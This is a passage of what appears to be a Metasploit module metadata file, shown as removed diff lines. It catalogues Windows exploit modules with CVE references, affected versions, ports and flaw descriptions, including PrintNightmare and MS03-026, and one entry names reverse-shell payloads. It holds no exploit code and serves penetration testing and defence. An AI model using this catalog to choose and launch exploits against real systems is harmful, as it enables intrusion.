dangerous\n usage of LoadLibrary. Due to the nature of the vulnerability, this module will work\n only when Protected Mode is not present or not enabled.", - "references": [ - "CVE-2013-2827", - "OSVDB-102135", - "BID-64941", - "ZDI-14-011", - "URL-http://ics-cert.us-cert.gov/advisories/ICSA-13-344-01" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb", - "is_install_path": true, - "ref_name": "windows/browser/wellintech_kingscada_kxclientdownload", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/winamp_playlist_unc": { - "name": "Winamp Playlist UNC Path Computer Name Overflow", - "fullname": "exploit/windows/browser/winamp_playlist_unc", - "aliases": [], - "rank": 500, - "disclosure_date": "2006-01-29", - "type": "exploit", - "author": [ - "hdm ", - "Faithless " - ], - "description": "This module exploits a vulnerability in the Winamp media player.\n This flaw is triggered when an audio file path is specified, inside a\n playlist, that consists of a UNC path with a long computer name. This\n module delivers the playlist via the browser. 
This module has only\n been successfully tested on Winamp 5.11 and 5.12.", - "references": [ - "CVE-2006-0476", - "OSVDB-22789", - "BID-16410" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Winamp 5.12 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/winamp_playlist_unc.rb", - "is_install_path": true, - "ref_name": "windows/browser/winamp_playlist_unc", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/winamp_ultravox": { - "name": "Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow", - "fullname": "exploit/windows/browser/winamp_ultravox", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-01-18", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Winamp 5.24. By\n sending an overly long artist tag, a remote attacker may\n be able to execute arbitrary code. 
This vulnerability can be\n exploited from the browser or the Winamp client itself.", - "references": [ - "CVE-2008-0065", - "OSVDB-41707", - "BID-27344" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Winamp 5.24" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/winamp_ultravox.rb", - "is_install_path": true, - "ref_name": "windows/browser/winamp_ultravox", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/windvd7_applicationtype": { - "name": "WinDVD7 IASystemInfo.DLL ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/windvd7_applicationtype", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-03-20", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in IASystemInfo.dll ActiveX\n control in InterVideo WinDVD 7. 
By sending an overly long string\n to the \"ApplicationType()\" property, an attacker may be able to\n execute arbitrary code.", - "references": [ - "CVE-2007-0348", - "OSVDB-34315", - "BID-23071" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 Pro English ALL", - "Windows XP Pro SP0/SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/windvd7_applicationtype.rb", - "is_install_path": true, - "ref_name": "windows/browser/windvd7_applicationtype", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/winzip_fileview": { - "name": "WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow", - "fullname": "exploit/windows/browser/winzip_fileview", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-11-02", - "type": "exploit", - "author": [ - "dean " - ], - "description": "The FileView ActiveX control (WZFILEVIEW.FileViewCtrl.61) could allow a\n remote attacker to execute arbitrary code on the system. The control contains\n several unsafe methods and is marked safe for scripting and safe for initialization.\n A remote attacker could exploit this vulnerability to execute arbitrary code on the\n victim system. 
WinZip 10.0 <= Build 6667 are vulnerable.", - "references": [ - "CVE-2006-5198", - "OSVDB-30433", - "BID-21060" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP2/ IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/winzip_fileview.rb", - "is_install_path": true, - "ref_name": "windows/browser/winzip_fileview", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/wmi_admintools": { - "name": "Microsoft WMI Administration Tools ActiveX Buffer Overflow", - "fullname": "exploit/windows/browser/wmi_admintools", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-12-21", - "type": "exploit", - "author": [ - "WooYun", - "MC ", - "jduck " - ], - "description": "This module exploits a memory trust issue in the Microsoft WMI\n Administration tools ActiveX control. When processing a specially crafted\n HTML page, the WEBSingleView.ocx ActiveX Control (1.50.1131.0) will treat\n the 'lCtxHandle' parameter to the 'AddContextRef' and 'ReleaseContext' methods\n as a trusted pointer. It makes an indirect call via this pointer which leads\n to arbitrary code execution.\n\n This exploit utilizes a combination of heap spraying and the\n .NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not\n opt-in to ASLR. 
As such, this module should be reliable on all Windows\n versions.\n\n The WMI Administrative Tools are a standalone download & install (linked in the\n references).", - "references": [ - "OSVDB-69942", - "CVE-2010-3973", - "BID-45546", - "URL-http://wooyun.org/bug.php?action=view&id=1006", - "URL-http://web.archive.org/web/20101228043011/http://secunia.com:80/advisories/42693", - "URL-http://www.microsoft.com/downloads/en/details.aspx?FamilyID=6430f853-1120-48db-8cc5-f2abdc3ed314" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows Universal", - "Debug Target (Crash)" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/browser/wmi_admintools.rb", - "is_install_path": true, - "ref_name": "windows/browser/wmi_admintools", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/x360_video_player_set_text_bof": { - "name": "X360 VideoPlayer ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/x360_video_player_set_text_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-01-30", - "type": "exploit", - "author": [ - "Rh0", - "juan vazquez " - ], - "description": "This module exploits a buffer overflow in the VideoPlayer.ocx ActiveX installed with the\n X360 Software. 
By setting an overly long value to 'ConvertFile()', an attacker can overrun\n a .data buffer to bypass ASLR/DEP and finally execute arbitrary code.", - "references": [ - "EDB-35948", - "URL-https://rh0dev.github.io/blog/2015/fun-with-info-leaks/" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb", - "is_install_path": true, - "ref_name": "windows/browser/x360_video_player_set_text_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/xmplay_asx": { - "name": "XMPlay 3.3.0.4 (ASX Filename) Buffer Overflow", - "fullname": "exploit/windows/browser/xmplay_asx", - "aliases": [], - "rank": 400, - "disclosure_date": "2006-11-21", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in XMPlay 3.3.0.4.\n The vulnerability is caused due to a boundary error within\n the parsing of playlists containing an overly long file name.\n This module uses the ASX file format.", - "references": [ - "CVE-2006-6063", - "OSVDB-30537", - "BID-21206", - "URL-http://web.archive.org/web/20070502134818/http://secunia.com:80/advisories/22999" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 Pro English SP4", - "Windows XP Pro SP2 English" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/browser/xmplay_asx.rb", - "is_install_path": true, - "ref_name": "windows/browser/xmplay_asx", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/yahoomessenger_fvcom": { 
- "name": "Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/yahoomessenger_fvcom", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-08-30", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in the Yahoo! Messenger ActiveX\n Control (YVerInfo.dll <= 2006.8.24.1). By sending an overly long string\n to the \"fvCom()\" method from a yahoo.com domain, an attacker may be able\n to execute arbitrary code.", - "references": [ - "CVE-2007-4515", - "OSVDB-37739", - "BID-25494", - "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=591" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP2 Pro English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/yahoomessenger_fvcom.rb", - "is_install_path": true, - "ref_name": "windows/browser/yahoomessenger_fvcom", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/yahoomessenger_server": { - "name": "Yahoo! Messenger 8.1.0.249 ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/yahoomessenger_server", - "aliases": [], - "rank": 400, - "disclosure_date": "2007-06-05", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in the Yahoo! Webcam Upload ActiveX\n Control (ywcupl.dll) provided by Yahoo! 
Messenger version 8.1.0.249.\n By sending an overly long string to the \"Server()\" method, and then calling\n the \"Send()\" method, an attacker may be able to execute arbitrary code.\n Using the payloads \"windows/shell_bind_tcp\" and \"windows/shell_reverse_tcp\"\n yield for the best results.", - "references": [ - "CVE-2007-3147", - "OSVDB-37082" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0/SP1 Pro English", - "Windows 2000 Pro English All" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/yahoomessenger_server.rb", - "is_install_path": true, - "ref_name": "windows/browser/yahoomessenger_server", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/zenturiprogramchecker_unsafe": { - "name": "Zenturi ProgramChecker ActiveX Control Arbitrary File Download", - "fullname": "exploit/windows/browser/zenturiprogramchecker_unsafe", - "aliases": [], - "rank": 600, - "disclosure_date": "2007-05-29", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module allows remote attackers to place arbitrary files on a users file system\n via the Zenturi ProgramChecker sasatl.dll (1.5.0.531) ActiveX Control.", - "references": [ - "CVE-2007-2987", - "OSVDB-36715", - "BID-24217" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb", - "is_install_path": true, - "ref_name": "windows/browser/zenturiprogramchecker_unsafe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - 
"exploit_windows/browser/zenworks_helplauncher_exec": { - "name": "AdminStudio LaunchHelp.dll ActiveX Arbitrary Code Execution", - "fullname": "exploit/windows/browser/zenworks_helplauncher_exec", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-10-19", - "type": "exploit", - "author": [ - "rgod", - "juan vazquez " - ], - "description": "This module exploits a vulnerability in AdminStudio LaunchHelp.dll ActiveX control. The\n LaunchProcess function found in LaunchHelp.HelpLauncher.1 allows remote attackers to run\n arbitrary commands on the victim machine. This module has been successfully tested with the\n ActiveX installed with AdminStudio 9.5, which also comes with Novell ZENworks Configuration\n Management 10 SP2, on IE 6 and IE 8 over Windows XP SP 3.", - "references": [ - "CVE-2011-2657", - "OSVDB-76700", - "BID-50274", - "ZDI-11-318", - "URL-http://www.novell.com/support/viewContent.do?externalId=7009570&sliceId=1" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2021-10-06 13:43:31 +0000", - "path": "/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb", - "is_install_path": true, - "ref_name": "windows/browser/zenworks_helplauncher_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/dcerpc/cve_2021_1675_printnightmare": { - "name": "Print Spooler Remote DLL Injection", - "fullname": "exploit/windows/dcerpc/cve_2021_1675_printnightmare", - "aliases": [ - "auxiliary/admin/dcerpc/cve_2021_1675_printnightmare" - ], - "rank": 300, - "disclosure_date": "2021-06-08", - "type": "exploit", - "author": [ - "Zhiniang Peng", - "Xuefeng Li", - "Zhipeng Huo", - "Piotr Madej", - "Zhang Yunhai", - "cube0x0", - "Spencer McIntyre", - "Christophe De La Fuente" - ], - "description": "The print spooler service can be 
abused by an authenticated remote attacker to load a DLL through a crafted\n DCERPC request, resulting in remote code execution as NT AUTHORITY\\SYSTEM. This module uses the MS-RPRN\n vector which requires the Print Spooler service to be running.", - "references": [ - "CVE-2021-1675", - "CVE-2021-34527", - "URL-https://github.com/cube0x0/CVE-2021-1675", - "URL-https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare", - "URL-https://github.com/calebstewart/CVE-2021-1675/blob/main/CVE-2021-1675.ps1", - "URL-https://github.com/byt3bl33d3r/ItWasAllADream" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Windows" - ], - "mod_time": "2022-05-24 09:16:30 +0000", - "path": "/modules/exploits/windows/dcerpc/cve_2021_1675_printnightmare.rb", - "is_install_path": true, - "ref_name": "windows/dcerpc/cve_2021_1675_printnightmare", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "PrintNightmare" - ], - "Stability": [ - "crash-service-down" - ], - "Reliability": [ - "unreliable-session" - ], - "SideEffects": [ - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/dcerpc/ms03_026_dcom": { - "name": "MS03-026 Microsoft RPC DCOM Interface Overflow", - "fullname": "exploit/windows/dcerpc/ms03_026_dcom", - "aliases": [], - "rank": 500, - "disclosure_date": "2003-07-16", - "type": "exploit", - "author": [ - "hdm ", - "spoonm ", - "cazz " - ], - "description": "This module exploits a stack buffer overflow in the RPCSS service, this vulnerability\n was originally found by the Last Stage of Delirium research group and has been\n widely exploited ever since. 
This module can exploit the English versions of\n Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request :)", - "references": [ - "CVE-2003-0352", - "OSVDB-2100", - "MSB-MS03-026", - "BID-8205" - ], - "platform": "Windows", - "arch": "", - "rport": 135, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows NT SP3-6a/2000/XP/2003 Universal" - ], - "mod_time": "2021-11-28 08:25:31 +0000", - "path": "/modules/exploits/windows/dcerpc/ms03_026_dcom.rb", - "is_install_path": true, - "ref_name": "windows/dcerpc/ms03_026_dcom", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/dcerpc/ms05_017_msmq": { - "name": "MS05-017 Microsoft Message Queueing Service Path Overflow", - "fullname": "exploit/windows/dcerpc/ms05_017_msmq", - "aliases": [], - "rank": 400, - "disclosure_date": "2005-04-12", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This module exploits a stack buffer overflow in the RPC interface\n to the Microsoft Message Queueing service. 
The offset to the\n return address changes based on the length of the system\n hostname, so this must be provided via the 'HNAME' option.\n Much thanks to snort.org and Jean-Baptiste Marchand's\n excellent MSRPC website.", - "references": [ - "CVE-2005-0059", - "OSVDB-15458", - "MSB-MS05-017", - "BID-13112" - ], - "platform": "Windows", - "arch": "", - "rport": 2103, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 ALL / Windows XP SP0-SP1 (English)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/dcerpc/ms05_017_msmq.rb", - "is_install_path": true, - "ref_name": "windows/dcerpc/ms05_017_msmq", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/dcerpc/ms07_029_msdns_zonename": { - "name": "MS07-029 Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP)", - "fullname": "exploit/windows/dcerpc/ms07_029_msdns_zonename", - "aliases": [], - "rank": 500, - "disclosure_date": "2007-04-12", - "type": "exploit", - "author": [ - "hdm ", - "Unknown", - "bcoles " - ], - "description": "This module exploits a stack buffer overflow in the RPC interface\n of the Microsoft DNS service. The vulnerability is triggered\n when a long zone name parameter is supplied that contains\n escaped octal strings. 
This module is capable of bypassing NX/DEP\n protection on Windows 2003 SP1/SP2.", - "references": [ - "CVE-2007-1748", - "OSVDB-34100", - "MSB-MS07-029" - ], - "platform": "Windows", - "arch": "", - "rport": 0, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic (2000 SP0-SP4, 2003 SP0-SP2)", - "Windows 2000 Server SP0-SP4+ English", - "Windows 2000 Server SP0-SP4+ French", - "Windows 2000 Server SP0-SP4+ German", - "Windows 2000 Server SP0-SP4+ Italian", - "Windows 2000 Server SP0-SP4+ Polish", - "Windows 2000 Server SP0-SP4+ Portuguese", - "Windows 2000 Server SP0-SP4+ Korean", - "Windows 2000 Server SP0-SP4+ Russian", - "Windows 2000 Server SP0-SP4+ Simplified Chinese", - "Windows 2000 Server SP0-SP4+ Spanish", - "Windows 2000 Server SP0-SP4+ Swedish", - "Windows 2000 Server SP0-SP4+ Traditional Chinese", - "Windows 2000 Server SP0-SP4+ Turkish", - "Windows 2003 Server SP0 English", - "Windows 2003 Server SP0 French", - "Windows 2003 Server SP1-SP2 English", - "Windows 2003 Server SP1-SP2 French", - "Windows 2003 Server SP1-SP2 Spanish", - "Windows 2003 Server SP1-SP2 Italian", - "Windows 2003 Server SP1-SP2 German", - "Windows 2003 Server SP1-SP2 Russian", - "Windows 2003 Server SP1-SP2 Simplified Chinese" - ], - "mod_time": "2021-11-30 07:38:08 +0000", - "path": "/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb", - "is_install_path": true, - "ref_name": "windows/dcerpc/ms07_029_msdns_zonename", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/dcerpc/ms07_065_msmq": { - "name": "MS07-065 Microsoft Message Queueing Service DNS Name Path Overflow", - "fullname": "exploit/windows/dcerpc/ms07_065_msmq", - "aliases": [], - "rank": 400, - "disclosure_date": "2007-12-11", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This module exploits a stack buffer overflow in the RPC interface\n to the 
Microsoft Message Queueing service. This exploit requires\n the target system to have been configured with a DNS name and\n for that name to be supplied in the 'DNAME' option. This name does\n not need to be served by a valid DNS server, only configured on\n the target machine.", - "references": [ - "CVE-2007-3039", - "OSVDB-39123", - "MSB-MS07-065" - ], - "platform": "Windows", - "arch": "", - "rport": 2103, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 Server English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/dcerpc/ms07_065_msmq.rb", - "is_install_path": true, - "ref_name": "windows/dcerpc/ms07_065_msmq", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/email/ms07_017_ani_loadimage_chunksize": { - "name": "Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)", - "fullname": "exploit/windows/email/ms07_017_ani_loadimage_chunksize", - "aliases": [], - "rank": 500, - "disclosure_date": "2007-03-28", - "type": "exploit", - "author": [ - "hdm ", - "skape " - ], - "description": "This module exploits a buffer overflow vulnerability in the\n LoadAniIcon() function of USER32.dll. 
The flaw is triggered\n through Outlook Express by using the CURSOR style sheet\n directive to load a malicious .ANI file.\n\n This vulnerability was discovered by Alexander Sotirov of Determina\n and was rediscovered, in the wild, by McAfee.", - "references": [ - "MSB-MS07-017", - "CVE-2007-0038", - "CVE-2007-1765", - "OSVDB-33629", - "BID-23194" - ], - "platform": "Windows", - "arch": "", - "rport": 25, - "autofilter_ports": [ - 25, - 465, - 587, - 2525, - 25025, - 25000 - ], - "autofilter_services": [ - "smtp", - "smtps" - ], - "targets": [ - "Automatic", - "Windows XP SP2 user32.dll 5.1.2600.2622", - "Windows XP SP2 userenv.dll English", - "Windows XP SP2 userenv.dll French", - "Windows XP SP0/SP1 netui2.dll English", - "Windows 2000 SP0-SP4 netui2.dll English", - "Windows Vista user32.dll 6.0.6000.16386", - "Windows XP SP2 user32.dll (5.1.2600.2180) Multi Language", - "Windows XP SP2 user32.dll (5.1.2600.2180) English", - "Windows XP SP2 userenv.dll Portuguese (Brazil)", - "Windows XP SP1a userenv.dll English", - "Windows XP SP1a shell32.dll English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb", - "is_install_path": true, - "ref_name": "windows/email/ms07_017_ani_loadimage_chunksize", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/email/ms10_045_outlook_ref_only": { - "name": "Outlook ATTACH_BY_REF_ONLY File Execution", - "fullname": "exploit/windows/email/ms10_045_outlook_ref_only", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-06-01", - "type": "exploit", - "author": [ - "Yorick Koster " - ], - "description": "It has been discovered that certain e-mail message cause Outlook to create Windows\n shortcut-like attachments or messages within Outlook. 
Through specially crafted TNEF\n streams with certain MAPI attachment properties, it is possible to set a path name\n to files to be executed. When a user double clicks on such an attachment or message,\n Outlook will proceed to execute the file that is set by the path name value. These\n files can be local files, but also files stored remotely (on a file share, for example)\n can be used. Exploitation is limited by the fact that it is not possible for attackers\n to supply command line options.", - "references": [ - "MSB-MS10-045", - "CVE-2010-0266", - "OSVDB-66296", - "BID-41446", - "URL-http://www.akitasecurity.nl/advisory.php?id=AK20091001" - ], - "platform": "Windows", - "arch": "", - "rport": 25, - "autofilter_ports": [ - 25, - 465, - 587, - 2525, - 25025, - 25000 - ], - "autofilter_services": [ - "smtp", - "smtps" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb", - "is_install_path": true, - "ref_name": "windows/email/ms10_045_outlook_ref_only", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/email/ms10_045_outlook_ref_resolve": { - "name": "Outlook ATTACH_BY_REF_RESOLVE File Execution", - "fullname": "exploit/windows/email/ms10_045_outlook_ref_resolve", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-06-01", - "type": "exploit", - "author": [ - "Yorick Koster " - ], - "description": "It has been discovered that certain e-mail message cause Outlook to create Windows\n shortcut-like attachments or messages within Outlook. Through specially crafted TNEF\n streams with certain MAPI attachment properties, it is possible to set a path name\n to files to be executed. When a user double clicks on such an attachment or message,\n Outlook will proceed to execute the file that is set by the path name value. 
These\n files can be local files, but also file stored remotely for example on a file share.\n Exploitation is limited by the fact that its is not possible for attackers to supply\n command line options.", - "references": [ - "MSB-MS10-045", - "CVE-2010-0266", - "OSVDB-66296", - "BID-41446", - "URL-http://www.akitasecurity.nl/advisory.php?id=AK20091001" - ], - "platform": "Windows", - "arch": "", - "rport": 25, - "autofilter_ports": [ - 25, - 465, - 587, - 2525, - 25025, - 25000 - ], - "autofilter_services": [ - "smtp", - "smtps" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb", - "is_install_path": true, - "ref_name": "windows/email/ms10_045_outlook_ref_resolve", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/emc/alphastor_agent": { - "name": "EMC AlphaStor Agent Buffer Overflow", - "fullname": "exploit/windows/emc/alphastor_agent", - "aliases": [], - "rank": 500, - "disclosure_date": "2008-05-27", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in EMC AlphaStor 3.1.\n By sending a specially crafted message, an attacker may\n be able to execute arbitrary code.", - "references": [ - "CVE-2008-2158", - "OSVDB-45714", - "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=702" - ], - "platform": "Windows", - "arch": "", - "rport": 41025, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "EMC AlphaStor 3.1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/emc/alphastor_agent.rb", - "is_install_path": true, - "ref_name": "windows/emc/alphastor_agent", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - 
"exploit_windows/emc/alphastor_device_manager_exec": { - "name": "EMC AlphaStor Device Manager Opcode 0x75 Command Injection", - "fullname": "exploit/windows/emc/alphastor_device_manager_exec", - "aliases": [], - "rank": 600, - "disclosure_date": "2013-01-18", - "type": "exploit", - "author": [ - "Anyway ", - "Preston Thornburn ", - "Mohsan Farid ", - "Brent Morris ", - "juan vazquez " - ], - "description": "This module exploits a flaw within the Device Manager (rrobtd.exe). When parsing the 0x75\n command, the process does not properly filter user supplied input allowing for arbitrary\n command injection. This module has been tested successfully on EMC AlphaStor 4.0 build 116\n with Windows 2003 SP2 and Windows 2008 R2.", - "references": [ - "CVE-2013-0928", - "ZDI-13-033" - ], - "platform": "Windows", - "arch": "x86", - "rport": 3000, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "EMC AlphaStor 4.0 < build 800 / Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/emc/alphastor_device_manager_exec.rb", - "is_install_path": true, - "ref_name": "windows/emc/alphastor_device_manager_exec", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/emc/networker_format_string": { - "name": "EMC Networker Format String", - "fullname": "exploit/windows/emc/networker_format_string", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-08-29", - "type": "exploit", - "author": [ - "Aaron Portnoy", - "Luigi Auriemma ", - "juan vazquez " - ], - "description": "This module exploits a format string vulnerability in the lg_sprintf function\n as implemented in liblocal.dll on EMC Networker products. This module exploits the\n vulnerability by using a specially crafted RPC call to the program number 0x5F3DD,\n version 0x02, and procedure 0x06. 
This module has been tested successfully on EMC\n Networker 7.6 SP3 on Windows XP SP3 and Windows 2003 SP2 (DEP bypass).", - "references": [ - "CVE-2012-2288", - "OSVDB-85116", - "BID-55330", - "URL-http://aluigi.altervista.org/misc/aluigi0216_story.txt" - ], - "platform": "Windows", - "arch": "", - "rport": 111, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "EMC Networker 7.6 SP3 / Windows Universal", - "EMC Networker 7.6 SP3 / Windows XP SP3", - "EMC Networker 7.6 SP3 / Windows 2003 SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/emc/networker_format_string.rb", - "is_install_path": true, - "ref_name": "windows/emc/networker_format_string", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/emc/replication_manager_exec": { - "name": "EMC Replication Manager Command Execution", - "fullname": "exploit/windows/emc/replication_manager_exec", - "aliases": [], - "rank": 500, - "disclosure_date": "2011-02-07", - "type": "exploit", - "author": [ - "Unknown", - "Davy Douhine" - ], - "description": "This module exploits a remote command-injection vulnerability in EMC Replication Manager\n client (irccd.exe). By sending a specially crafted message invoking RunProgram function an\n attacker may be able to execute arbitrary commands with SYSTEM privileges. Affected\n products are EMC Replication Manager < 5.3. This module has been successfully tested\n against EMC Replication Manager 5.2.1 on XP/W2003. 
